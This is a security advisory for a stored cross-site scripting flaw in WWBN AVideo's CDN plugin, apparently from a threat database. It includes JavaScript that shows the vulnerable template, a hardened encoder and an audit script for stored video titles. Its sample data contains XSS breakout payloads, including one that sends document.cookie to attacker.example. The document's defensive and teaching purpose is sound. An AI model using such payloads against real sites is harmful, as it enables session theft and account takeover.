CVE-2026-33295: CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in WWBN AVideo
WWBN AVideo is an open source video platform. Prior to version 26.0, WWBN/AVideo contains a stored cross-site scripting vulnerability in the CDN plugin's download buttons component. The `clean_title` field of a video record is interpolated directly into a JavaScript string literal without any escaping, allowing an attacker who can create or modify a video to inject arbitrary JavaScript that executes in the browser of any user who visits the affected download page. Version 26.0 fixes the issue.
AI Analysis
Technical Summary
CVE-2026-33295 is a stored cross-site scripting vulnerability in the WWBN AVideo open-source video platform, affecting versions before 26.0. The flaw sits in the CDN plugin's download buttons component, where the clean_title field of a video record is interpolated directly into a JavaScript string literal without escaping. Because the value lands inside a string literal in a script block rather than in HTML text, HTML entity encoding is not the relevant defence: a double quote or backslash in the value terminates the literal and the remainder is parsed as code, and a `</script>` in the value ends the script element entirely, after which the rest is parsed as markup. An attacker who can create or modify a video entry can therefore store a payload that runs in the site's origin in the browser of every user who opens the affected download page, which is enough to read cookies not marked HttpOnly, lift session and CSRF tokens from the DOM, and issue authenticated requests on the victim's behalf. The CVSS 4.0 base score is 8.2 (high): network attack vector, low attack complexity, privileges limited to an account that can create or modify videos, and user interaction required in that a victim must visit the page. No exploitation in the wild has been reported. Version 26.0 fixes the issue; the standard fix for this class of bug in a PHP application such as AVideo is to emit the value as a JavaScript string with json_encode and the JSON_HEX_TAG, JSON_HEX_AMP, JSON_HEX_APOS and JSON_HEX_QUOT flags rather than concatenating it into the script.
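The breakout mechanics described above, as an added example that is not AVideo's code (the affected component is PHP; this illustration is in JavaScript so the generated script can be executed the way a browser would): a vulnerable template that concatenates clean_title into a string literal, a hardened encoder, and a harness that runs each one against two constructed payloads. The function names, the `title` variable and the `sandbox` object are assumptions for the demo.

```javascript
// Added example (not AVideo project code): how an unescaped clean_title
// inside a JavaScript string literal becomes stored XSS, and how to encode
// the value so it cannot break out. All names here are assumptions.

// Vulnerable pattern: the value is concatenated straight into a script
// literal, so a double quote (or backslash) ends the literal and a
// "</script>" ends the whole script element.
function renderDownloadButtonVulnerable(cleanTitle) {
  return '<script>var title = "' + cleanTitle + '";</script>';
}

// Hardened: JSON-encode the value, then replace the characters that matter
// inside an HTML <script> element. JSON alone leaves "<", ">" and "&"
// untouched, so "</script>" would survive; it also leaves U+2028/U+2029 raw,
// which older JavaScript engines reject inside a string literal.
function jsStringLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/&/g, '\\u0026')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

function renderDownloadButtonHardened(cleanTitle) {
  return '<script>var title = ' + jsStringLiteral(cleanTitle) + ';</script>';
}

// An HTML tokenizer closes a <script> element at the first "</script>",
// regardless of the JavaScript around it. Return the script bodies it sees.
function scriptBodies(html) {
  const bodies = [];
  const re = /<script>([\s\S]*?)<\/script>/g;
  let m;
  while ((m = re.exec(html)) !== null) bodies.push(m[1]);
  return bodies;
}

// Execute the first script body the way a browser would, with a sandbox
// object standing in for window so a payload has something to touch.
// new Function is used only to simulate the victim's browser in this demo.
function runGeneratedScript(html) {
  const js = scriptBodies(html)[0] || '';
  const sandbox = { hit: false };
  const run = new Function('sandbox', js + '\nreturn { title: title, sandbox: sandbox };');
  return run(sandbox);
}

// Constructed payloads: a quote breakout and a script-element breakout.
const QUOTE_BREAKOUT = '"; sandbox.hit = true; //';
const TAG_BREAKOUT = '</script><img src=x onerror=sandbox.hit=true>';

// Summary of what each template does with the quote payload: the vulnerable
// output runs the injected statement and leaves title empty, the hardened
// output round-trips the value unchanged and runs nothing extra.
function demo() {
  return {
    vulnerable: runGeneratedScript(renderDownloadButtonVulnerable(QUOTE_BREAKOUT)),
    hardened: runGeneratedScript(renderDownloadButtonHardened(QUOTE_BREAKOUT)),
  };
}
```

With the vulnerable template the TAG_BREAKOUT payload leaves `var title = "` as the only script body, which is a syntax error the browser silently swallows, and the `<img ... onerror=...>` that follows is rendered as markup and fires. In PHP the equivalent of jsStringLiteral is `json_encode($cleanTitle, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT)`, whose default escaping of non-ASCII also covers U+2028/U+2029. If the literal sits inside an inline event-handler attribute rather than a script element, the result additionally needs HTML attribute encoding, because the attribute value is decoded by the HTML parser before the JavaScript parser sees it.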
Potential Impact
Exploitation of CVE-2026-33295 gives the attacker arbitrary JavaScript execution in the origin of an AVideo site (versions before 26.0) for every user who opens the affected download page. That is enough for session hijacking where the session cookie is not HttpOnly, for requesting pages and submitting forms as the victim, including as an administrator who reviews or downloads the video, for harvesting credentials through an injected login prompt, and for redirecting users to malware. Because the payload is stored in the video record, it fires for every visitor until the record is cleaned, and on public instances that includes anonymous viewers. The only privilege required is the ability to create or modify a video, which many deployments grant to ordinary registered users, so the bug turns any contributor account into a foothold against moderators and administrators. For organizations that run AVideo for customers or the public, the result is account compromise and a data breach originating from a platform users are expected to trust.
Mitigation Recommendations
Upgrade WWBN AVideo to version 26.0 or later; that is the only complete fix. Until the upgrade is done, restrict the right to create or modify videos to trusted accounts and review which accounts hold it. Audit existing video records: any clean_title containing a double quote, single quote, backslash, `<` or a line terminator can break out of the string literal, and a `</script>` in the value ends the script element regardless of quoting; clean or remove such records and inspect the account that wrote them. A WAF rule gives only partial cover, since the stored payload need not contain `<script>` at all (a double quote followed by JavaScript is enough) and it is written once by a legitimate-looking form submission, so any rule should inspect the title and clean_title parameters of the video create and edit requests rather than look for script tags in general. Content Security Policy limits what the attacker can do but does not prevent the injection: the payload runs inside an inline script the page itself emits, so a policy that allows that script via 'unsafe-inline' or a nonce allows the payload as well, and a hash-based allow-list is rarely practical because the script's content varies with the video data. CSP still raises the cost by blocking loads and connections to attacker-controlled hosts through script-src, connect-src and img-src, and it blocks the `</script><script src=...>` variant, which opens a script the policy has not allowed. Finally, log and alert on video creation and modification where the title contains quotes, angle brackets or `</script>`, and on metadata changes by accounts that do not normally make them.
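The record audit recommended above, as an added example that is not AVideo's code: a classifier for clean_title values that can break out of a JavaScript string literal or close a script element, run over a set of constructed video records. The record shape (id, users_id, clean_title) and the sample rows are assumptions; a real audit would read the rows from the AVideo database. The optional slug check assumes clean_title is normally a URL slug, which the advisory does not state, so it is off by default.

```javascript
// Added example (not AVideo project code): offline audit of stored video
// records for clean_title values that can break out of a JavaScript string
// literal or close a <script> element. Record shape and rows are constructed.

// Each rule names the breakout it would enable in the vulnerable template.
const RULES = [
  { name: 'quote-breakout', re: /["'\\]/ },                 // ends a quoted literal
  { name: 'script-close', re: /<\/script/i },               // ends the script element
  { name: 'tag-injection', re: /<[a-z!\/]/i },              // starts a tag or comment
  { name: 'line-terminator', re: /[\r\n\u2028\u2029]/ },    // ends the literal in older engines
  { name: 'control-char', re: /[\x00-\x08\x0b\x0c\x0e-\x1f]/ },
];

// Assumed shape of a benign clean_title when the field is a slug.
const SLUG = /^[a-z0-9-]+$/i;

function classifyTitle(title, opts = {}) {
  const reasons = RULES.filter(r => r.re.test(title)).map(r => r.name);
  if (opts.expectSlug && !SLUG.test(title)) reasons.push('non-slug');
  return reasons;
}

// Return one finding per record whose clean_title trips any rule, keeping the
// owning account so the follow-up investigation has somewhere to start.
function auditVideos(videos, opts = {}) {
  const findings = [];
  for (const v of videos) {
    const reasons = classifyTitle(String(v.clean_title ?? ''), opts);
    if (reasons.length) {
      findings.push({ id: v.id, users_id: v.users_id, reasons, clean_title: v.clean_title });
    }
  }
  return findings;
}

// Distinct accounts that own flagged records, sorted for reporting.
function suspiciousUsers(findings) {
  return [...new Set(findings.map(f => f.users_id))].sort((a, b) => a - b);
}

// Constructed sample export: two benign rows, a quote breakout, a script-close
// breakout, and a single quote that is harmless here but would break a
// single-quoted literal elsewhere.
const SAMPLE_VIDEOS = [
  { id: 1, users_id: 10, clean_title: 'quarterly-update-2026' },
  { id: 2, users_id: 10, clean_title: 'Team meeting (recording)' },
  { id: 3, users_id: 42, clean_title: 'x"; fetch("https://attacker.example/?c="+document.cookie); //' },
  { id: 4, users_id: 42, clean_title: '</script><script>alert(document.domain)</script>' },
  { id: 5, users_id: 7, clean_title: "O'Reilly interview" },
];
```

`auditVideos(SAMPLE_VIDEOS)` flags records 3, 4 and 5 and `suspiciousUsers` reduces that to accounts 7 and 42; with `{ expectSlug: true }` record 2 is also reported as non-slug. Treat every hit as something to read by hand: a single quote is usually an ordinary title, while a double quote followed by code or a `</script>` is not.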
Affected Countries
United States, Germany, United Kingdom, Canada, Australia, France, Japan, South Korea, India, Brazil
Technical Details
- Data Version: 5.2
- Assigner Short Name: GitHub_M
- Date Reserved: 2026-03-18T18:55:47.427Z
- CVSS Version: 4.0
- State: PUBLISHED
Threat ID: 69c023c9f4197a8e3ba36531
Added to database: 3/22/2026, 5:15:53 PM
Last enriched: 3/29/2026, 8:01:06 PM
Last updated: 5/7/2026, 4:27:28 AM